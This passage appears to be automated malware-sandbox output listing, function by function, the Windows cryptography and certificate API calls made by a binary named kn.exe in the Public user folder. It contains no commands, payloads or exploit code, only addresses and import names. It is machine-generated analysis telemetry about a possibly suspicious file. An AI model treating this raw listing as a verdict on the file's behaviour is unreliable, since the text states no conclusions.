      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C529878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF67C529878
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C553860
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF67C54184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF67C53D850
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF67C55391C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF67C57F918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C38FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4D3918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5218DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF67C5218DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B8D0 I_CryptGetLruEntryData,#357,6_2_00007FF67C53B8D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5251A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF67C5251A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF67C587178
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C533188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF67C533188
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C535164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C535164
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF67C53F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A9208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF67C5A9208
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF67C587214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5531C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5531C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5871C8 BCryptDestroyKey,#360,6_2_00007FF67C5871C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5511C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF67C5511C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5532A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5532A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF67C51B2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF67C57D28C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF67C587290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF67C4ED240
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4ED304
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF67C4EB324
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF67C53D30C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5292D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF67C5292D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C54F2F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5192C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF67C5192C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5332D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C5332D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF67C58739C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5893A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C5893A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5333A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF67C5333A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5633B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF67C5633B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C553390
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF67C4E7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C515338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C515338
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF67C4DB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF67C50B350
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C58141C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF67C53B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5353E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF67C5353E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5113F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C5113F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF67C57F4A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C559480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C559480
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF67C53F488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF67C56B464
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF67C4B5438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5534F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C5534F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C513504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF67C513504
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF67C56B4EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5814F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C5814F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C582DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF67C582DAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586D78 NCryptOpenKey,#360,6_2_00007FF67C586D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C552D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550D84 NCryptFreeObject,#205,#357,6_2_00007FF67C550D84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E0E24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C534DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C534DDC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586DE0 NCryptCreatePersistedKey,#360,6_2_00007FF67C586DE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF67C5A0DB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF67C550DD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C578DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF67C578DD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF67C4F0E94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586EA8 NCryptImportKey,#360,6_2_00007FF67C586EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C522E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C522E7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57EE94 CryptSignMessage,SetLastError,6_2_00007FF67C57EE94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C594E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF67C594E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF67C552E6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586E48 NCryptSetProperty,#360,6_2_00007FF67C586E48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586F2C NCryptExportKey,#360,6_2_00007FF67C586F2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF67C4E8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF67C550EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF67C5B0ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF67C4E4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF67C586FAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF67C550FB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C540F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF67C540F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF67C57EF74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C534F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C534F50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55301C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C557020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C557020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C549028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF67C549028
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C302F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF67C4C7034
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58700C BCryptEnumAlgorithms,#360,6_2_00007FF67C58700C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF67C51B098
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C55B0A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF67C4F107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58705C BCryptGetProperty,#360,6_2_00007FF67C58705C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C551058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF67C551058
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF67C57511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587124 BCryptGenerateKeyPair,#360,6_2_00007FF67C587124
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C509134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF67C509134
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5510D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF67C5510D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5530D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5530D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5870C8 BCryptSetProperty,#360,6_2_00007FF67C5870C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55099C BCryptOpenAlgorithmProvider,#205,#359,#359,6_2_00007FF67C55099C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5129A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C5129A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C582994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C582994
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C558940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,6_2_00007FF67C558940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF67C55C940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C4DC960
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C554A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF67C554A1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF67C550A18
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C534A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF67C534A34
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,6_2_00007FF67C53AA00
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C58A9F0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C51E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF67C51E9F0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C558AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C558AA0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4C6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,6_2_00007FF67C4C6A84
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C582A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,6_2_00007FF67C582A78
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,6_2_00007FF67C4F2B00
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C548AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C548AFC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C552AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,6_2_00007FF67C552AE4
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C550ABC BCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF67C550ABC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C580B9C CryptHashData,GetLastError,#357,6_2_00007FF67C580B9C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF67C57CBB4
